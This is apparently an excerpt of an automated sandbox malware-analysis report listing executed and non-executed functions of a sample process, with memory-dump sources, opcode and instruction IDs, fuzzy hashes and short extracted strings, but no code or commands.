                                                                                                            • Opcode Fuzzy Hash: d02bc4d49bb1b82636f044fcf03ca1ffea640ce5aeb4d7af664cbf7a2684397e
                                                                                                            • Instruction Fuzzy Hash: 662125B1608204DFCB04EF14EDC4B25BBA5FB94318F20C56DDA0A5B292C336E806CB62
                                                                                                            Function 06F31E44 Relevance: .1, Instructions: 71COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000008.00000002.4144663887.0000000006F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F30000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_8_2_6f30000_sgxIb.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: a0813cfaac495f18e2d63113e15b6416061d9a0bfaec08ac536fa22c52849d89
                                                                                                            • Instruction ID: c31ae038a1e96fd46eeba65d1340b4690ec56a0921c48f889223cbfcd0b87122
                                                                                                            • Opcode Fuzzy Hash: a0813cfaac495f18e2d63113e15b6416061d9a0bfaec08ac536fa22c52849d89
                                                                                                            • Instruction Fuzzy Hash: A231D2B0C01218DFDB60DF99C999B9EBBF5EB48314F24801AE805B7341C7B59A45CFA0
                                                                                                            Function 068540E0 Relevance: .1, Instructions: 59COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000008.00000002.4143406631.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_8_2_6850000_sgxIb.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: b944a0426f7983ce50b9b0bc8a8a88b9889bd164060e525270b18b014f4c0def
                                                                                                            • Instruction ID: 4bac378578b24963d20a7e0561792e60dcb142679dba75cec2d383a9f80d6d76
                                                                                                            • Opcode Fuzzy Hash: b944a0426f7983ce50b9b0bc8a8a88b9889bd164060e525270b18b014f4c0def
                                                                                                            • Instruction Fuzzy Hash: 94118E32B141299FDB589668DC146AF73FAABC8310F01453AD90AE7340EE35DC428B91
                                                                                                            Function 06854318 Relevance: .1, Instructions: 55COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000008.00000002.4143406631.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_8_2_6850000_sgxIb.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 5ccfc2adecf25f913a37790abcec8ea2f7822a905ccc62732c99a8115b8390c7
                                                                                                            • Instruction ID: 2871547540264be963d4ed3456aa6015f6914764eae3e2eaad2f6f5c11b4a7d0
                                                                                                            • Opcode Fuzzy Hash: 5ccfc2adecf25f913a37790abcec8ea2f7822a905ccc62732c99a8115b8390c7
                                                                                                            • Instruction Fuzzy Hash: 3601D435B101100BDB68967DD800BAEB7DBDBC9714F14843EE50EC7355EEA5CC828391
                                                                                                            Function 0685F2B8 Relevance: .1, Instructions: 54COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000008.00000002.4143406631.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_8_2_6850000_sgxIb.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 8c59de8ffc2a454a79c5968a73c94f7d0cb0b8086023cefbca616eb1bea75f78
                                                                                                            • Instruction ID: c20c0577d1eb051fe65414ae6f34fcb57487b348d8d5135b4062583cf2a5f453
                                                                                                            • Opcode Fuzzy Hash: 8c59de8ffc2a454a79c5968a73c94f7d0cb0b8086023cefbca616eb1bea75f78
                                                                                                            • Instruction Fuzzy Hash: 3C01D431B041501BDF61D67DB4287AE77DADB8A714F148429EA0AC7384ED51DC424786
                                                                                                            Function 06853D9B Relevance: .1, Instructions: 53COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000008.00000002.4143406631.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_8_2_6850000_sgxIb.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 390420ebbffa27a10f279b8822865c95bc677de2bf525de05e87fbba56efa42c
                                                                                                            • Instruction ID: 891dc053edf06f74b72d9375b1c2a685b7d61abf610528f4e7211668ddd104e9
                                                                                                            • Opcode Fuzzy Hash: 390420ebbffa27a10f279b8822865c95bc677de2bf525de05e87fbba56efa42c
                                                                                                            • Instruction Fuzzy Hash: E421CFB5D01219AFCB00DF9AD884ADEFBF4FB49310F10812AE918B7340D374A954CBA5
                                                                                                            Function 00E2D1F3 Relevance: .1, Instructions: 53COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000008.00000002.4120549021.0000000000E2D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E2D000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_8_2_e2d000_sgxIb.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 118f051af2fa4d3b71157da4c1d703aecab942a5cdb4903c1e78cbe3821e71d1
                                                                                                            • Instruction ID: 96c47c73f89d9e7e7dbb11c90b91485c1fc70b96e4adfe4aa1ae531306ecb499
                                                                                                            • Opcode Fuzzy Hash: 118f051af2fa4d3b71157da4c1d703aecab942a5cdb4903c1e78cbe3821e71d1
                                                                                                            • Instruction Fuzzy Hash: AF11C476508280CFDB12CF14E9C4B55FF71FB84324F24C6AAD9495B656C33AD80ACB91
                                                                                                            Function 00E2D3A3 Relevance: .1, Instructions: 53COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000008.00000002.4120549021.0000000000E2D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E2D000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_8_2_e2d000_sgxIb.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 5bc96cb8dbab4a459d35c79ebbe5ba2a9dff6c5f08df11ade35b896c854f64ae
                                                                                                            • Instruction ID: b6a76e1bb991478a92623036261d4d9f314ed9f98be9e85d42de4d2f269259cf
                                                                                                            • Opcode Fuzzy Hash: 5bc96cb8dbab4a459d35c79ebbe5ba2a9dff6c5f08df11ade35b896c854f64ae
                                                                                                            • Instruction Fuzzy Hash: EC11D075508280CFDB01DF10D9C4B15BB72FB94328F24C6AEDA494B296C33AE84ACB52
                                                                                                            Function 06853DA0 Relevance: .1, Instructions: 52COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000008.00000002.4143406631.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_8_2_6850000_sgxIb.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: fd79f863035f3ea598f08b4bb9edb61d4f62b6bbe221555c4e35909911054331
                                                                                                            • Instruction ID: 5a5f040c5581255a5ac4f50abcb7e9193eeabf646a4efc98e204feab5635b1e8
                                                                                                            • Opcode Fuzzy Hash: fd79f863035f3ea598f08b4bb9edb61d4f62b6bbe221555c4e35909911054331
                                                                                                            • Instruction Fuzzy Hash: AE11AFB5D01259AFCB10DF9AD884ADEFBF4FB49310F10812AE918B7241D374A954CBA5
                                                                                                            Function 06854328 Relevance: .1, Instructions: 51COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000008.00000002.4143406631.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_8_2_6850000_sgxIb.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 64d1f4d47af82314c33bab60211d10888656ad0df896baa75d106da0f0e23736
                                                                                                            • Instruction ID: 19315f78a335751125d3ed2b3f010061482f3d53a8e2feda9b2a9618ac44c9d6
                                                                                                            • Opcode Fuzzy Hash: 64d1f4d47af82314c33bab60211d10888656ad0df896baa75d106da0f0e23736
                                                                                                            • Instruction Fuzzy Hash: B4018131B201201BDB68957DA411BAFA7DBDBCA714F25843EEA0EC7364DD61DC824395
                                                                                                            Function 0685A420 Relevance: .0, Instructions: 50COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000008.00000002.4143406631.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_8_2_6850000_sgxIb.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 5d9fa4c49d3e5afc07c7a7fd45d38b88c9da5270befade5ff1b3fbb0229a91e3
                                                                                                            • Instruction ID: 36abd628e5daf4d5dcb73bd2a0f93442cb31f6d3fd1c368c6d6fada7c24bae25
                                                                                                            • Opcode Fuzzy Hash: 5d9fa4c49d3e5afc07c7a7fd45d38b88c9da5270befade5ff1b3fbb0229a91e3
                                                                                                            • Instruction Fuzzy Hash: 60012471F100004FCBA8D6B8E49576E77D6EB8A709F124539E90ACB755ED25DC428380
                                                                                                            Function 0685F2C8 Relevance: .0, Instructions: 49COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000008.00000002.4143406631.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_8_2_6850000_sgxIb.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: f23dea6fb23d382b679b083109f9d145a07ba4fa95f256061e2dbe441f1f1f2b
                                                                                                            • Instruction ID: 43ac39beb54f825d0b4ad4a6406df6d11b90aa96106934d3d92d3af10b36e952
                                                                                                            • Opcode Fuzzy Hash: f23dea6fb23d382b679b083109f9d145a07ba4fa95f256061e2dbe441f1f1f2b
                                                                                                            • Instruction Fuzzy Hash: A9018C35B101101BDF65D67DA464B6E62DADBC9728F148839EA0EC7384EE61DC424786
                                                                                                            Function 068540D1 Relevance: .0, Instructions: 49COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000008.00000002.4143406631.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_8_2_6850000_sgxIb.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 554e627b8b505920019ff82e5b7787c2a24ca7829bf55529f246c3882029e186
                                                                                                            • Instruction ID: c58b6e8297788d1d6dcb0a70c23b1197087f089ac4bd80940c7954c4a8fe5b9a
                                                                                                            • Opcode Fuzzy Hash: 554e627b8b505920019ff82e5b7787c2a24ca7829bf55529f246c3882029e186
                                                                                                            • Instruction Fuzzy Hash: 3C01AD36F141155BEF9896A89C107EF33FBABC8314F01413AD90BE7384EE648C424792
                                                                                                            Function 0685A430 Relevance: .0, Instructions: 46COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000008.00000002.4143406631.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_8_2_6850000_sgxIb.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: c6cdcd804f8a476bd3e3c146aa0664518262362f4d71ae8ef051292fedb6bb13
                                                                                                            • Instruction ID: c74b74d6b6eed560397e9db9af9a97a361bf235ed862b4b2b06c1909b38c9328
                                                                                                            • Opcode Fuzzy Hash: c6cdcd804f8a476bd3e3c146aa0664518262362f4d71ae8ef051292fedb6bb13
                                                                                                            • Instruction Fuzzy Hash: 36018130B101114BCB68E6BCE49576E77DAEB8A719F104529E60EC7744DD21EC4287D5
                                                                                                            Function 0685C908 Relevance: .0, Instructions: 43COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000008.00000002.4143406631.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_8_2_6850000_sgxIb.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 010cc6e48bd6eea1d97e904c43df24b19e583ca87eb1ca4795d86c762d20fbfa
                                                                                                            • Instruction ID: 5f6682227e91db5084d690c5365400cbd98c1594d784ec925d91d1c938872bfe
                                                                                                            • Opcode Fuzzy Hash: 010cc6e48bd6eea1d97e904c43df24b19e583ca87eb1ca4795d86c762d20fbfa
                                                                                                            • Instruction Fuzzy Hash: EC01A431F202289BCF64AA7AE851A9DB779FB85354F00443DE905EB344EB72A8458BC1
                                                                                                            Function 06856588 Relevance: .0, Instructions: 24COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000008.00000002.4143406631.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_8_2_6850000_sgxIb.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 9560278111645665e56bd31d5f1c241c7a0a2dc5ca5b18fc08c886d5584e2355
                                                                                                            • Instruction ID: ecbbfaab10e5112d1729c871b8a01c1d8767e82206aee38ab0d9ac8b7302cf1c
                                                                                                            • Opcode Fuzzy Hash: 9560278111645665e56bd31d5f1c241c7a0a2dc5ca5b18fc08c886d5584e2355
                                                                                                            • Instruction Fuzzy Hash: F9E0D8F1D151445FDF60CB748A0539E77A49B01204F6649E6CC08DB216F275CE418741

                                                                                                            Non-executed Functions

                                                                                                            Function 068577B8 Relevance: 13.0, Strings: 10, Instructions: 468COMMON
                                                                                                            Download Yara Rule
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000008.00000002.4143406631.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_8_2_6850000_sgxIb.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: $^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
                                                                                                            • API String ID: 0-2222239885
                                                                                                            • Opcode ID: 2b605f7732f9ead5cb9f1c379ef16fca24caebf3b997065f867a0b9c266bcaf1
                                                                                                            • Instruction ID: 4b40a1a639ab4b7c635f690ee883a4dabb3731d6cd11e76c9efedaa0bbf0e2db
                                                                                                            • Opcode Fuzzy Hash: 2b605f7732f9ead5cb9f1c379ef16fca24caebf3b997065f867a0b9c266bcaf1
                                                                                                            • Instruction Fuzzy Hash: 69122E30E002198FDB68DF65C854AADB7F2BF89304F2189A9D50AEB355DB349D85CF81
                                                                                                            Function 0685AA50 Relevance: 10.2, Strings: 8, Instructions: 229COMMON
                                                                                                            Download Yara Rule
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000008.00000002.4143406631.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_8_2_6850000_sgxIb.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: $^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
                                                                                                            • API String ID: 0-3823777903
                                                                                                            • Opcode ID: ec7de44837fa4b416107bcf72853fe9f6adcbcff034c52b26b54daaa212b4752
                                                                                                            • Instruction ID: 113e55c4c33bd60b2f08dc4fb7cd17014cf35bf879aa8acb3ea641f93b5ff4ee
                                                                                                            • Opcode Fuzzy Hash: ec7de44837fa4b416107bcf72853fe9f6adcbcff034c52b26b54daaa212b4752
                                                                                                            • Instruction Fuzzy Hash: CA917E30E002099FEB6CEB65D995B6E7BF2BF44305F118629E802EB254DF749C85CB91
                                                                                                            Function 068571B8 Relevance: 9.2, Strings: 7, Instructions: 405COMMON
                                                                                                            Download Yara Rule
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000008.00000002.4143406631.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_8_2_6850000_sgxIb.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: .5vq$$^q$$^q$$^q$$^q$$^q$$^q
                                                                                                            • API String ID: 0-390881366
                                                                                                            • Opcode ID: dc3937bec30ca8c1a6b406e6d5cbd24370bb1ab8c5ab182657cecebd5be0d83e
                                                                                                            • Instruction ID: 2c151f25afa5c2ba2551f8deb955dce5bc24da5bacc0afc27c7c1dd2c96a240b
                                                                                                            • Opcode Fuzzy Hash: dc3937bec30ca8c1a6b406e6d5cbd24370bb1ab8c5ab182657cecebd5be0d83e
                                                                                                            • Instruction Fuzzy Hash: E9F13C30A00248CFDB58EBA9D594A6EB7F2FF84305F218469D806DB359DF759C82DB80
                                                                                                            Function 0685BB30 Relevance: 7.7, Strings: 6, Instructions: 197COMMON
                                                                                                            Download Yara Rule
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000008.00000002.4143406631.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_8_2_6850000_sgxIb.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: $^q$$^q$$^q$$^q$$^q$$^q
                                                                                                            • API String ID: 0-2392861976
                                                                                                            • Opcode ID: 1341f1cf1783b6a5cad64009ce720340043f0f408da66154e96d6bf8a026208a
                                                                                                            • Instruction ID: 288e5efbf710cd66a3db6087b73642dd0b9c80c8a3d5741e09fbf052a5b280df
                                                                                                            • Opcode Fuzzy Hash: 1341f1cf1783b6a5cad64009ce720340043f0f408da66154e96d6bf8a026208a
                                                                                                            • Instruction Fuzzy Hash: 9471AE30E002198FDBA8DF68D4646ADB7F2FF95315B218869D80ADF254DF70AD45CB81
                                                                                                            Function 068584F0 Relevance: 5.3, Strings: 4, Instructions: 282COMMON
                                                                                                            Download Yara Rule
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000008.00000002.4143406631.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_8_2_6850000_sgxIb.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: $^q$$^q$$^q$$^q
                                                                                                            • API String ID: 0-2125118731
                                                                                                            • Opcode ID: 2cfc57f7986c62abe7c66ff0701ac1e717cc9132480a0118a6b6e81acbcb6d35
                                                                                                            • Instruction ID: e122d4a0e62938359ef64371a250610edd69eabd06675d1b659103d6a92b1539
                                                                                                            • Opcode Fuzzy Hash: 2cfc57f7986c62abe7c66ff0701ac1e717cc9132480a0118a6b6e81acbcb6d35
                                                                                                            • Instruction Fuzzy Hash: D4B12B70E002188FDB54EB69D9946AEB7F2FF84301F25882AD906DB355DB75DC82CB81
                                                                                                            Function 06858908 Relevance: 5.2, Strings: 4, Instructions: 168COMMON
                                                                                                            Download Yara Rule
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000008.00000002.4143406631.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_8_2_6850000_sgxIb.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: LR^q$LR^q$$^q$$^q
                                                                                                            • API String ID: 0-2454687669
                                                                                                            • Opcode ID: c5a187944574e221020feff1e7df0c5ee76c9c14cac76898a0e96deb1c5a47f3
                                                                                                            • Instruction ID: e210e3ffb7aa67820fc85bc031419c8a41ed96e08ad92bd37339e2e462fb9a2a
                                                                                                            • Opcode Fuzzy Hash: c5a187944574e221020feff1e7df0c5ee76c9c14cac76898a0e96deb1c5a47f3
                                                                                                            • Instruction Fuzzy Hash: A151F170B002158FCB58EB28D940A6E77E6FF88304F118969E906DF3A5DA30EC41CB92
                                                                                                            Function 0685ADD8 Relevance: 5.2, Strings: 4, Instructions: 163COMMON
                                                                                                            Download Yara Rule
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000008.00000002.4143406631.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_8_2_6850000_sgxIb.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: $^q$$^q$$^q$$^q
                                                                                                            • API String ID: 0-2125118731
                                                                                                            • Opcode ID: 1fdb687675666289182501d80371ce2ac269593806d2796401717cd7eee73b59
                                                                                                            • Instruction ID: 080d1371b94e9c94915edb62613061d5ad38e3261b650021603ceb44734256cf
                                                                                                            • Opcode Fuzzy Hash: 1fdb687675666289182501d80371ce2ac269593806d2796401717cd7eee73b59
                                                                                                            • Instruction Fuzzy Hash: 0B51AD30E102048FCBA9DB64D9D46ADB7B2FB89300F15862AE916DB354DB719C81CB90